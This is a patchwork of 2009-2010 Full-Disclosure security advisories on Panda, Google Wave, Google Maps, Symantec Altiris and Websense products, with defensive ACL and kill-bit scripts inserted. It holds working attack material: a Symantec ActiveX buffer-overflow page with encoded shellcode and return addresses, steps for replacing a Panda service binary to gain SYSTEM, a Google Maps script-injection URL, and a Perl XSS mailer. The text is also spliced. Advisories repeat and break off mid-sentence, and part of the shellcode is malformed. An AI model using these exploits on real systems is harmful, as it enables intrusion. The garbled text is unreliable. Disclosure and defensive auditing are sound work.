Service-Release Paket V. 1.0
+--- http://www.datev.de/portal/ShowPage.do?pid=dpi&nid=96550

Disclosure Timeline (YYYY/MM/DD):
=================================
2010.01.11: Vulnerability found
2010.01.25: Initial contact via online forms
2010.01.26: Initial vendor response
2010.01.26: Asked for a PGP key and sent the Disclosure Policy to the vendor. [-] No response
2010.01.28: Asked if the vendor received my last email.
2010.01.28: Vendor is unable to use PGP.
2010.01.28: Sent PoC, advisory, disclosure policy and planned disclosure date (2010.02.11) to the vendor
2010.01.29: Vendor acknowledges receipt of the advisory and starts to develop a patch.
2010.02.02: Patch is finished. Vendor wishes to delay the release
[Full-disclosure] [UPDATE] NSOADV-2010-001: Panda Security Local Privilege Escalation
Security Advisory NSOADV-2010-001 (Version 2)

Title:              Panda Security Local Privilege Escalation
Severity:           Medium
Advisory ID:        NSOADV-2010-001
Found Date:         02.2008
Date Reported:      30.11.2009
Release Date:       09.01.2010
Update Date:        20.01.2010
Author:             Nikolas Sotiriu (lofi)
Website:            http://sotiriu.de
Mail:               nso-research at sotiriu.de
URL:                http://sotiriu.de/adv/NSOADV-2010-001.txt
Vendor:             Panda Security (http://www.pandasecurity.com/)
Affected Products:  (Self tested)
                    - Panda Security for Business 4.04.10
                    - Panda Security for Business with Exchange 4.04.10
                    - Panda Security for Enterprise 4.04.10
                    - Panda Internet Security 2010 (15.01.00)
                    - Panda Global Protection 2010 (3.01.00)
                    - Panda Antivirus Pro 2010 (9.01.00)
                    - Panda Antivirus for Netbooks (9.01.00)
                    (Provided by Panda)
                    - Panda Global Protection 2009
                    - Panda Internet Security 2009
                    - Panda Antivirus Pro 2009
                    - Panda Internet Security 2008
                    - Panda Antivirus + Firewall 2008
                    - Panda Platinum 2007 Internet Security
                    - Panda Platinum 2006 Internet Security
Affected Component: Corporate Products:
                    - Panda Security for Desktops 4.05.10
                    - Panda Security for File Servers 8.04.10
Remote Exploitable: No
Local Exploitable:  Yes
Patch Status:       Vendor released a patch (See Solution)
Discovered by:      Nikolas Sotiriu
Disclosure Policy:  http://sotiriu.de/policy.html
Thanks to:          Thierry Zoller: For the permission to use his Policy

Background:
===========
Panda Security for Product is the security solution for companies that need to protect their networks, mainly workstations and file servers. Panda Security for Business is centrally managed thanks to the AdminSecure Console, which allows monitoring the entire network, protecting your critical assets against all types of threats and optimizing productivity.
(Product description from Panda Website)

This vulnerability is similar to the following vulnerabilities in Panda products, which were discovered earlier:
Sep 07 2006 3APA3A: http://www.securityfocus.com/bid/19891
Aug 02 2007 tarkus: http://www.securityfocus.com/bid/25186
Oct 31 2009 Protek: http://www.securityfocus.com/archive/1/507615
Nov 02 2009 Maxim:  http://www.securityfocus.com/bid/36897

The earlier reported vulnerabilities only affected the home user products, but the business products had the same bug. More interesting is that, since 2006, Panda has failed each year by releasing the new version with the same old bug.

Description:
============
1. 32-bit version of Panda Security for Desktops/File Servers
+------------------------------------------------------------
During installation of Panda Security for Desktops/File Servers the permissions of the installation folder %ProgramFiles%\Panda Software\AVTC\ are by default set to Everyone:Full Control. Several services (e.g. PAVSRV51.EXE) are started from this folder, and the services run under the LocalSystem account.

The 32-bit version of Panda Security for Desktops/File Servers installs the TruePrevent package by default, which protects the files in the installation directory from manipulation. If the TruePrevent service (Panda TPSrv) is not running, the files are completely unprotected. A normal user is not able to stop the service, but normally he can boot his workstation in SafeBoot mode, in which TPSrv is not started and all service files can be manipulated.

This can be exploited by:
a. Boot the PC in SafeBoot mode by pressing F8 during the boot process
b. Rename PAVSRV51.exe to PAVSRV51.old in the Panda folder
c. Copy any application to PAVSRV51.exe
d. Reboot

Upon reboot the trojaned application will be executed under the LocalSystem account.
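The root cause in item 1 is a DACL, not the binary itself, so it can be audited before anyone reboots into Safe Mode. The following is an added example, not Panda's code or the advisory author's: a parser for `icacls` output that flags ACEs granting write-capable rights to principals every local user belongs to, and a helper that lists which of the service executables named in the advisory live under such a directory. The icacls output is constructed for the example and assumes %ProgramFiles% expands to C:\Program Files; the rights and principal tables, and the function names, are the example's own choices.

```python
import ntpath
import re

# icacls short names that let a principal create or replace files in a
# directory: generic F/M/W, plus the specific rights WD (write data / add
# file), AD (append data / add subdirectory), DC (delete child), D/DE (delete)
# and WDAC/WO (write DACL / take ownership, which let the holder grant the rest).
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "DC", "D", "DE", "WDAC", "WO"}

# Principals any local user is a member of, compared on the part after the
# domain or authority prefix, case-insensitively.
LOW_PRIV = {"everyone", "users", "authenticated users", "interactive", "domain users"}

ACE_RE = re.compile(r"^(?P<principal>[^:]+):(?P<rights>(?:\([A-Za-z,]*\))+)$")


def parse_icacls(output, path):
    """(principal, rights) for each ACE printed by `icacls <path>`. The first
    line starts with the path itself, later ACEs are indented; the trailing
    summary line is skipped."""
    aces = []
    for raw in output.splitlines():
        line = raw.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        if line.lower().startswith(path.lower()):
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if m:
            aces.append((m.group("principal"), m.group("rights")))
    return aces


def rights_tokens(rights):
    """'(OI)(CI)(RX,W)' -> {'OI', 'CI', 'RX', 'W'}"""
    tokens = set()
    for group in re.findall(r"\(([^)]*)\)", rights):
        tokens.update(t for t in group.split(",") if t)
    return tokens


def weak_aces(output, path):
    """ACEs that let a low-privileged principal write into path."""
    return [
        (principal, rights)
        for principal, rights in parse_icacls(output, path)
        if principal.rsplit("\\", 1)[-1].lower() in LOW_PRIV
        and rights_tokens(rights) & WRITE_RIGHTS
    ]


def services_in_dir(image_paths, weak_dir):
    """Service executables located under the weakly protected directory; each
    of them can be swapped for a trojan that runs as LocalSystem on next boot."""
    prefix = ntpath.normcase(weak_dir.rstrip("\\")) + "\\"
    return [p for p in image_paths if ntpath.normcase(p).startswith(prefix)]


# Constructed icacls output for the advisory's install folder (not captured
# from a real host); %ProgramFiles% assumed to be C:\Program Files.
AVTC_DIR = r"C:\Program Files\Panda Software\AVTC"
SAMPLE_ICACLS = r"""C:\Program Files\Panda Software\AVTC Everyone:(OI)(CI)(F)
                                     NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                                     BUILTIN\Administrators:(I)(OI)(CI)(F)
                                     BUILTIN\Users:(I)(OI)(CI)(RX)

Successfully processed 1 files; Failed processing 0 files
"""

# Service images from the advisory, plus one outside the folder as a control.
SERVICE_IMAGES = [
    r"C:\Program Files\Panda Software\AVTC\PSKMsSvc.exe",
    r"C:\Program Files\Panda Software\AVTC\PavSrv51.exe",
    r"C:\Program Files\Panda Software\AVTC\PavFnSvr.exe",
    r"C:\Program Files\Panda Software\AVTC\PSHost.exe",
    r"C:\Program Files\Panda Software\AVTC\PsImSvc.exe",
    r"C:\Program Files\Panda Software\AVTC\PsCtrlS.exe",
    r"C:\Program Files\Panda Software\AVTC\TPSrv.exe",
    r"C:\Windows\System32\svchost.exe",
]

if __name__ == "__main__":
    for principal, rights in weak_aces(SAMPLE_ICACLS, AVTC_DIR):
        print(f"weak ACE on {AVTC_DIR}: {principal} {rights}")
    for image in services_in_dir(SERVICE_IMAGES, AVTC_DIR):
        print("replaceable service binary:", image)
```

On a real host, run `icacls "C:\Program Files\Panda Software\AVTC"` and pass the output to `weak_aces`. Note the limit of the audit: it tells you whether the DACL permits the replacement; whether a running protection component (TruePrevent here) blocks it at runtime is a separate question, which is why the advisory's steps go through Safe Mode.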
Executable started as services: +-- %ProgramFiles%\PANDA SOFTWARE\AVTC\PSKMsSvc.exe (Desktop only) %ProgramFiles%\PANDA SOFTWARE\AVTC\PavSrv51.exe %ProgramFiles%\PANDA SOFTWARE\AVTC\PavFnSvr.exe %ProgramFiles%\PANDA SOFTWARE\AVTC\PSHost.exe %ProgramFiles%\PANDA SOFTWARE\AVTC\PsImSvc.exe %ProgramFiles%\PANDA SOFTWARE\AVTC\PsCtrlS.exe %ProgramFiles%\PANDA SOFTWARE\AVTC\TPSrv.exe 2. 64Bit Version of Panda Security for Desktops/File Servers
[Full-disclosure] NSOADV-2010-002: Google Wave Design Bugs
Security Advisory NSOADV-2010-002

Title:               Google Wave Design Bugs
Severity:            Low
Advisory ID:         NSOADV-2010-002
Found Date:          16.11.2009
Date Reported:       18.11.2009
Release Date:        19.01.2010
Author:              Nikolas Sotiriu (lofi)
Mail:                nso-research at sotiriu.de
URL:                 http://sotiriu.de/adv/NSOADV-2010-002.txt
Vendor:              Google (http://www.google.com/)
Affected Products:   Google Wave Preview (Date: = 14.01.2010)
Not Affected Component: Google Wave Preview (Date: = 14.01.2010)
Remote Exploitable:  Yes
Local Exploitable:   No
Patch Status:        partially patched
Discovered by:       Nikolas Sotiriu
Disclosure Policy:   http://sotiriu.de/policy.html
Thanks to:           Thierry Zoller: For the permission to use his Policy

Background:
===
Google Wave is an online tool for real-time communication and collaboration. A wave can be both a conversation and a document where people can discuss and work together using richly formatted text, photos, videos, maps, and more.
(Product description from Google Website)

Description:

All these possible attacks are the result of four hours of playing with Google Wave. I didn't check all the funny stuff that is possible with Wave.

1. Gadget phishing attack:
--
The Google Wave Gadget API can be used for phishing attacks. An attacker can build his own phishing gadget, share it with his Google Wave contacts and hopefully get the login credentials from a user. This behavior is normal; the problem is that it makes it easier to steal logins.

2. Virus spreading attack:
--
Uploaded files are not scanned for malicious code. An attacker could upload his malware to a wave and share it with his Google Wave contacts.

Proof of Concept:
==
A proof of concept gadget can be found here: http://sotiriu.de/demos/phgadget.xml

Solution:
=
1. No changes made here. Workaround: Don't trust Waves.
2. Google builds in AV scanning.

Disclosure Timeline (YYYY/MM/DD):
=
2009.11.16: Vulnerability found
2009.11.17: Sent PoC, Advisory, Disclosure policy and planned disclosure date (2009.12.03) to Vendor
2009.11.23: Vendor response
2009.12.01: Ask for a status update, because the planned release date is 2009.12.03.
2009.12.03: Google Security Team asks for two more weeks to patch.
2009.12.03: Changed release date to 2009.12.17.
2009.12.15: Ask for a status update, because the planned release date is 2009.12.17. = No Response
2009.12.21: Ask for a status update.
2009.12.29: Google Security Team informs me that there are no changes made before 2010.01.03.
2010.01.14: Google Security Team informs me that uploaded files will now be scanned for malware. Google Gadgets will not be updated.
2010.01.19: Release of this Advisory

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google Maps XSS (currently unpatched)
Looks like a really quick fix from Google. Directly after I got the PoC it worked. Now it doesn't.

On 12.01.2010 13:58, Michael Lenz wrote:
> Your PoC generates:
>
>   *Google* Sorry...
>   We're sorry... ... but your computer or network may be sending automated queries. To protect our users, we can't process your request right now. See Google Help http://www.google.com/support/bin/answer.py?answer=86640 for more information.
>   © 2009 Google - Google Home http://www.google.com
>
> So..?
>
> gaurav baruah wrote:
>> Google Maps XSS (currently unpatched)
>>
>> Discovered By -
>> Pratul Agrawal (pratu...@gmail.com)
>> Gaurav Baruah (baruah.gau...@gmail.com)
>>
>> PoC - http://maps.google.com/maps?f=q&source=s_q&hl=en&geocode=&q=%3Cscript%3Ealert(%22Google%20Sucks%20!%22)%3C/script%3E&vps=1&sll=28.613554,77.20906&sspn=0.009136,0.013797&ie=UTF8
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] NSOADV-2010-001: Panda Security Local Privilege Escalation
Security Advisory NSOADV-2010-001

Title:               Panda Security Local Privilege Escalation
Severity:            Medium
Advisory ID:         NSOADV-2010-001
Found Date:          02.2008
Date Reported:       30.11.2009
Release Date:        09.01.2010
Author:              Nikolas Sotiriu (lofi)
Mail:                nso-research at sotiriu.de
URL:                 http://sotiriu.de/adv/NSOADV-2010-001.txt
Vendor:              Panda Security (http://www.pandasecurity.com/)

Affected Products:
  (Self tested)
  - Panda Security for Business 4.04.10
  - Panda Security for Business with Exchange 4.04.10
  - Panda Security for Enterprise 4.04.10
  - Panda Internet Security 2010 (15.01.00)
  - Panda Global Protection 2010 (3.01.00)
  - Panda Antivirus Pro 2010 (9.01.00)
  - Panda Antivirus for Netbooks (9.01.00)
  (Provided by Panda)
  - Panda Global Protection 2009
  - Panda Internet Security 2009
  - Panda Antivirus Pro 2009
  - Panda Internet Security 2008
  - Panda Antivirus + Firewall 2008
  - Panda Platinum 2007 Internet Security
  - Panda Platinum 2006 Internet Security

Affected Component:
  Corporate Products:
  - Panda Security for Desktops 4.05.10
  - Panda Security for File Servers 8.04.10

Remote Exploitable:  No
Local Exploitable:   Yes
Patch Status:        Vendor released a patch (See Solution)
Discovered by:       Nikolas Sotiriu
Disclosure Policy:   http://sotiriu.de/policy.html
Thanks to:           Thierry Zoller: For the permission to use his Policy

Background:
===
Panda Security for Product is the security solution for companies that need to protect their networks, mainly workstations and file servers. Panda Security for Business is centrally managed thanks to the AdminSecure Console, which allows monitoring the entire network, protecting your critical assets against all types of threats and optimizing productivity.
(Product description from Panda Website)

This vulnerability is similar to the following vulnerabilities in Panda products, which were discovered earlier:
  Sep 07 2006  3APA3A: http://www.securityfocus.com/bid/19891
  Aug 02 2007  tarkus: http://www.securityfocus.com/bid/25186
  Oct 31 2009  Protek: http://www.securityfocus.com/archive/1/507615
  Nov 02 2009  Maxim:  http://www.securityfocus.com/bid/36897

The earlier reported vulnerabilities only affected the home user products, but the business products had the same bug. More interesting is that since 2006 Panda has shipped each new version with the same old bug.

Description:

1. 32Bit Version of Panda Security for Desktops/File Servers
+---
During installation of Panda Security for Desktops/File Servers the permissions for the installation folder %ProgramFiles%\Panda Software\AVTC\ are by default set to Everyone:Full Control. A few services (e.g. PAVSRV51.EXE) are started from this folder, and they run under the LocalSystem account.

The 32bit version of Panda Security for Desktops/File Servers installs the TruePrevent package by default, which protects the files in the installation directory from manipulation. If the TruePrevent service (Panda TPSrv) is not running, the files are completely unprotected. A normal user is not able to stop the service, but normally he can boot his workstation in SafeBoot mode, in which TPSrv is not started and all service files can be manipulated.

This can be exploited by:
  a. Boot the PC in SafeBoot mode by pressing F8 during the boot process
  b. Rename PAVSRV51.exe to PAVSRV51.old in the Panda folder
  c. Copy any application to PAVSRV51.exe
  d. Reboot

Upon reboot the trojaned application will be executed under the LocalSystem account.

Executables started as services:
+--
  %ProgramFiles%\PANDA SOFTWARE\AVTC\PSKMsSvc.exe (Desktop only)
  %ProgramFiles%\PANDA SOFTWARE\AVTC\PavSrv51.exe
  %ProgramFiles%\PANDA SOFTWARE\AVTC\PavFnSvr.exe
  %ProgramFiles%\PANDA SOFTWARE\AVTC\PSHost.exe
  %ProgramFiles%\PANDA SOFTWARE\AVTC\PsImSvc.exe
  %ProgramFiles%\PANDA SOFTWARE\AVTC\PsCtrlS.exe
  %ProgramFiles%\PANDA SOFTWARE\AVTC\TPSrv.exe

2. 64Bit Version of Panda Security for Desktops/File Servers
+---
During installation of Panda Security
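The root cause described in both copies of the NSOADV-2010-001 text above (the Version 2 post and the original) is a LocalSystem service whose image directory grants Everyone:Full Control; the TruePrevent driver only masks that ACL while it is loaded, and the advisory shows it is absent in Safe Mode. The following PowerShell script is an added example written for this page, not code from the advisory or from Panda. It assumes an elevated session on the host being audited, and it lists every LocalSystem service whose executable directory gives create, delete or permission-change rights to Everyone, Users, Authenticated Users or INTERACTIVE, which is the condition that makes the rename-and-replace step in the advisory possible.

```powershell
# Added example (not from the advisory or from Panda): audit services that run
# as LocalSystem from a directory writable by low-privileged principals.
# Assumes an elevated PowerShell session on the host being audited.

$WeakPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Rights that let a user replace, rename or re-ACL files in the directory.
# Modify and FullControl contain these bits, so they are caught as well.
$DangerousRights = [System.Security.AccessControl.FileSystemRights](
    'CreateFiles, AppendData, Delete, DeleteSubdirectoriesAndFiles, ChangePermissions, TakeOwnership')

function Get-ServiceImagePath {
    param([string]$PathName)
    # Service image paths are either quoted ("C:\Program Files\x.exe" -arg)
    # or unquoted, possibly with spaces; take the quoted part, otherwise
    # everything up to the first ".exe" (assumption: the image is an .exe).
    if ($PathName -match '^"([^"]+)"') { $exe = $Matches[1] }
    elseif ($PathName -match '^(.+?\.exe)') { $exe = $Matches[1] }
    else { $exe = $PathName.Trim() }
    return [Environment]::ExpandEnvironmentVariables($exe)
}

function Test-WeakDirectoryAcl {
    param([string]$Directory)
    # Returns the first Allow ACE that gives a weak principal dangerous rights,
    # or $null when the directory ACL is acceptable.
    $acl = Get-Acl -LiteralPath $Directory -ErrorAction Stop
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($WeakPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band [int]$DangerousRights) -ne 0) {
            return [pscustomobject]@{
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
            }
        }
    }
    return $null
}

Get-CimInstance Win32_Service |
    Where-Object { $_.StartName -eq 'LocalSystem' -and $_.PathName } |
    ForEach-Object {
        $exe = Get-ServiceImagePath $_.PathName
        $dir = Split-Path -Path $exe -Parent
        if (-not $dir -or -not (Test-Path -LiteralPath $dir)) { return }
        $weak = Test-WeakDirectoryAcl $dir
        if ($weak) {
            [pscustomobject]@{
                Service   = $_.Name
                Directory = $dir
                Principal = $weak.Principal
                Rights    = $weak.Rights
            }
        }
    } | Format-Table -AutoSize
```

The check targets the ACL rather than the presence of the TPSrv service, because an ACL that only a kernel component keeps safe is still a misconfiguration once that component is not loaded. Two caveats: ACEs carrying generic rights (large numeric values, usually inherit-only) are not decoded by the bitmask test, and the path parser assumes an image name ending in .exe.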
[Full-disclosure] NSOADV-2009-001: Symantec ConsoleUtilities ActiveX Control buffer overflow
Security Advisory NSOADV-2009-001

Title:               Symantec ConsoleUtilities ActiveX Control Buffer Overflow
Severity:            Critical
Advisory ID:         NSOADV-2009-001
Found Date:          09.09.2009
Date Reported:       15.09.2009
Release Date:        02.11.2009
Author:              Nikolas Sotiriu
Mail:                nso-research at sotiriu.de
URL:                 http://sotiriu.de/adv/NSOADV-2009-001.txt
Vendor:              Symantec (http://www.symantec.com/)
Affected Products:   Symantec Altiris Notification Server 6.x
                     Symantec Management Platform 7.0.x
                     Symantec Altiris Deployment Solution 6.9.x
Affected Component:  ConsoleUtilities ActiveX Control V.6.0.0.1846
Not Affected Component: ConsoleUtilities ActiveX Control V.6.0.0.2000
Remote Exploitable:  Yes
Local Exploitable:   No
CVE-ID:              CVE-2009-3031
Patch Status:        Vendor released a patch
Discovered by:       Nikolas Sotiriu
Disclosure Policy:   http://sotiriu.de/policy.html
Thanks to:           Thierry Zoller: For the permission to use his Policy

Background:
===
Altiris service-oriented management solutions provide a modular and future-proof approach to managing highly diverse and widely distributed IT infrastructures. They are open solutions that enable lifecycle integration of client, handheld, server, network and other IT assets with audit-ready security and automated operation.
(Product description from Symantec Website)

Description:

During the first access of the Management Website an ActiveX control is installed (AeXNSConsoleUtilities.dll), in which the function BrowseAndSaveFile is vulnerable to a stack based buffer overflow.

  Name:    ConsoleUtilities Class
  Vendor:  Altiris, Inc.
  Type:    ActiveX Control
  Version: 6.0.0.1846
  GUID:    {B44D252D-98FC-4D5C-948C-BE868392A004}
  File:    AeXNSConsoleUtilities.dll
  Folder:  C:\WINDOWS\system32

Proof of Concept:
==
<html>
<title>NSOADV-2009-001</title>
<object classid='clsid:B44D252D-98FC-4D5C-948C-BE868392A004' id='obj'></object>
<script language='vbscript'>
Sub Submit_OnClick
  For i=0 to 2
    If document.ret.os(i).checked Then
      target=document.ret.os(i).value
    End If
  Next
  EIP=unescape(target)
  arg1 = ""
  arg3 = ""
  arg4 = ""
  arg5 = ""
  junk=String(310, "A")                    'junk
  morejunk=String(18, unescape("%u0041"))  'more junk
  ' windows/exec - 224 bytes
  ' http://www.metasploit.com
  ' Encoder: x86/call4_dword_xor
  ' EXITFUNC=seh, CMD=calc.exe
  code=unescape("%uc92b%ue983%ue8ce%u%u%u5ec0%u7681%ue60e" _
  & "%u2dad%u8338%ufcee%uf4e2%u451a%u38a4%uade6%ub14d" _
  & "%u9c03%u5cff%uff6d%ub31d%ua1b4%u6aa6%u26f2%u105f" _
  & "%u1ae9%u1e67%u52d7%uf81c%u914a%u444c%u81e4%uf90d" _
  & "%ua029%uff2c%u5d04%u6f7f%uff6d%ub33d%u91a4%ue82c" _
  & "%ued6d%ubd55%ud926%u3967%ufd36%u70a6%u26fe%u1875" _
  & "%u7ee7%u04ce%u26af%ub319%u7be7%uc71c%u6dd7%uf981" _
  & "%ua029%uff2c%u4dde%ucc58%ud0e5%u03d5%u899b%uda58" _
  & "%u26be%u1c75%u7ee7%ub34b%ue6ea%u60a6%uacfa%ub3fe" _
  & "%u26e2%ue82c%ue96f%u1c09%uf6bd%u614c%ufcbc%ud8d2" _
  & "%uf2be%ub377%u46f4%u65ab%uac8c%ubda0%uad5f%u382d" _
  & "%uc5b6%ub31c%u2a89%uedd2%u535d%u0a23%uc50c%uad8b" _
  & "%u305b%uedd2%uabda%u3251%u5666%u4dcd%u16e3%u2b6a" _
  & "%uc294%u3847%u52b5%u5bf8%uc187%u164e%ud583%u3848")
  buf=junk+EIP+morejunk+break+code
  obj.BrowseAndSaveFile arg1, buf, arg3, arg4, arg5
End Sub
</script>
<h2>Symantec ConsoleUtilities ActiveX Control Buffer overflow PoC</h2>
Use it only for education or ethical pentesting!
The author accepts no liability for damage caused by this tool.<br>
Nikolas Sotiriu (lofi) (http://www.sotiriu.de/adv/NSOADV-2009-001.txt), 02.11.2009<br>
<h3>Some RET Infos:</h3>
Overwrite EIP with (crash)<br>
EIP=String(2, unescape("%u4141"))<br><br>
XP SP2 Ger shell32.dll JMP ESP<br>
EIP=unescape("%uaf0a%u77d5")<br><br>
XP SP3 Ger shell32.dll JMP ESP<br>
EIP=unescape("%u30D7%u7E68")<br><br>
<form name=ret>
<input type=radio name=os value=%u4141%u4141> DoS<br>
<input type=radio name=os value=%uaf0a%u77d5> Windows XP SP2 German<br>
<input type=radio name=os value=%u30D7%u7E68> Windows XP SP3 German<br>
<input type=button name=Submit VALUE=Exploit>
</form>
<img src=http://sotiriu.de/images/logo_wh_80.png>
</html>

Solution:
=
Symantec Security Advisory: http://tinyurl.com/y9fakve
Hotfix (KB49568): Deployment Solution 6.9 SP3 https://kb.altiris.com/display
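Until the patched control is deployed, the standard Windows mitigation for a vulnerable ActiveX control is the Internet Explorer "kill bit" (Microsoft KB 240797): a Compatibility Flags value of 0x400 under the ActiveX Compatibility key for the control's CLSID, which makes IE refuse to instantiate it. The following PowerShell script is an added example for this page, not code from the advisory or from Symantec; it uses the CLSID listed in the advisory, assumes an elevated session, and sets and then verifies the kill bit in both the native and the Wow6432Node hives on 64-bit Windows.

```powershell
# Added example (not from the advisory or from Symantec): set and verify the
# IE kill bit for the ConsoleUtilities control named in NSOADV-2009-001.
# Assumes an elevated PowerShell session.

$Clsid   = '{B44D252D-98FC-4D5C-948C-BE868392A004}'   # CLSID from the advisory
$KillBit = 0x400                                       # COMPAT_EVIL_DONT_LOAD (KB 240797)

$CompatKeys = @(
    "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
)
# 32-bit Internet Explorer on 64-bit Windows reads the Wow6432Node hive.
if ([Environment]::Is64BitOperatingSystem) {
    $CompatKeys += "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
}

function Set-ActiveXKillBit {
    param([string[]]$Keys, [int]$Flags)
    foreach ($key in $Keys) {
        if (-not (Test-Path -LiteralPath $key)) {
            New-Item -Path $key -Force | Out-Null
        }
        $current = (Get-ItemProperty -LiteralPath $key -Name 'Compatibility Flags' `
                        -ErrorAction SilentlyContinue).'Compatibility Flags'
        # Keep any flags already present and OR in the kill bit.
        $new = [int]$current -bor $Flags
        Set-ItemProperty -LiteralPath $key -Name 'Compatibility Flags' -Value $new -Type DWord
    }
}

function Test-ActiveXKillBit {
    param([string[]]$Keys, [int]$Flags)
    # True only when every relevant hive carries the kill bit.
    foreach ($key in $Keys) {
        $value = (Get-ItemProperty -LiteralPath $key -Name 'Compatibility Flags' `
                      -ErrorAction SilentlyContinue).'Compatibility Flags'
        if (-not $value -or (($value -band $Flags) -eq 0)) { return $false }
    }
    return $true
}

Set-ActiveXKillBit -Keys $CompatKeys -Flags $KillBit
if (Test-ActiveXKillBit -Keys $CompatKeys -Flags $KillBit) {
    "Kill bit set for $Clsid"
} else {
    "Kill bit NOT set for $Clsid"
}
```

Test-ActiveXKillBit is the part worth keeping in a compliance baseline: it can be run on its own across the fleet to confirm the mitigation is present. If the fixed control (V.6.0.0.2000 per the advisory) keeps the same CLSID, the kill bit will block it as well, so remove the value once the hotfix is deployed.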
[Full-disclosure] NSOADV-2009-003: Websense Email Security Cross Site Scripting
Security Advisory NSOADV-2009-003

Title:               Websense Email Security Cross Site Scripting
Severity:            Low
Advisory ID:         NSOADV-2009-003
Found Date:          28.09.2009
Date Reported:       01.10.2009
Release Date:        20.10.2009
Author:              Nikolas Sotiriu
Mail:                nso-research (at) sotiriu.de
URL:                 http://sotiriu.de/adv/NSOADV-2009-003.txt
Vendor:              Websense (http://www.websense.com/)
Affected Products:   Websense Email Security v7.1
                     Personal Email Manager v7.1
Not Affected Products: Websense Email Security v7.1 Hotfix 4
                     Personal Email Manager v7.1 Hotfix 4
Remote Exploitable:  Yes
Local Exploitable:   Yes
Patch Status:        Patched with Hotfix 4
Disclosure Policy:   http://sotiriu.de/policy.html
Thanks to:           Thierry Zoller: for the permission to use his Policy

Background:
===
Websense Email Security software incorporates multiple layers of real-time Web security and data security intelligence to provide leading email protection from converged email and Web 2.0 threats. It helps to manage outbound data leaks and compliance risk, and enables a consolidated security strategy with the trusted leader in Essential Information Protection.
(Product description from Websense Website)

The Websense Email Security Web Administrator is a web frontend that provides access to message administration, directory management and the log.

Description:

1. XSS in webfrontend:
--
The web frontend does not properly sanitize some variables before they are returned to the user.

  http://target:8181/web/msgList/viewmsg/actions/msgAnalyse.asp \
    ?Queue=Network%20Security&FileName=[XSS]&IsolatedMessageID=[XSS] \
    &ServerName=[XSS]&Dictionary=[XSS]&Scoring=[XSS]&MessagePart=[XSS]

  http://target:8181/web/msgList/viewmsg/actions/msgForwardToRis \
    kFilter.asp?Queue=[XSS]&FileName=[XSS]&IsolatedMessageID=[XSS] \
    &ServerName=[XSS]

  http://target:8181/web/msgList/viewmsg/viewHeaders.asp?Queue= \
    [XSS]&FileName=[XSS]&IsolatedMessageID=[XSS]&ServerName=[XSS]

This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of the Web Administrator frontend.

2. XSS in webfrontend through a Mail Subject:
-
The subject of an email sent through the Websense Mail Security server is not properly sanitized before it is shown in the Web Administrator frontend. Script code like <script>alert('X')</script> will be executed in the user's browser in the context of the Web Administrator frontend. The mail has to be held in a queue, and the code executes when the administrator inspects it. A subject like VIAGRA<script>alert('XSS')</script> will result in a hold in the Anti Spam Queue.

Proof of Concept:
==
  #!/usr/bin/perl
  use MIME::Lite;
  use Net::SMTP;

  (($server = $ARGV[0]) && ($rcpt = $ARGV[1])) || die "Usage: $0 server Recipient\n";

  my $from_address = 'x...@mail.com';
  my $to_address   = "<" . $rcpt . ">";
  my $mail_host    = $server;
  my $subject      = 'VIAGRA XSS File <BODY ONLOAD=alert(\'XSS\')>';
  my $message_body = "XSS Test File";

  $msg = MIME::Lite->new(
      From    => $from_address,
      To      => $to_address,
      Subject => $subject,
      Type    => 'multipart/mixed'
  ) or die "Error creating multipart container: $!\n";

  $msg->attach(
      Type => 'TEXT',
      Data => $message_body
  ) or die "Error adding the text message part: $!\n";

  MIME::Lite->send('smtp', $mail_host, Timeout => 60);
  $msg->send;

Solution:
=
Vendor released a patch.
http://tinyurl.com/yhe3hqa

Disclosure Timeline (YYYY/MM/DD):
=
2009.09.28: Vulnerability found
2009.10.01: Ask for a PGP Key
2009.10.01: Websense sent their PGP Key
2009.10.01: Sent PoC, Advisory, Disclosure policy and planned disclosure date to Vendor
2009.10.08: Websense verifies the finding
2009.10.13: Websense fixed it. The patch will be available in Version 7.2 which will be released in ~2 weeks
2009.10.13: Ask for a list of affected versions/products and changed the release date to 2009.10.29. (no response)
2009.10.20: Found the KB article and the Hotfix on Websense website
2009.10.20: Release of this advisory

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/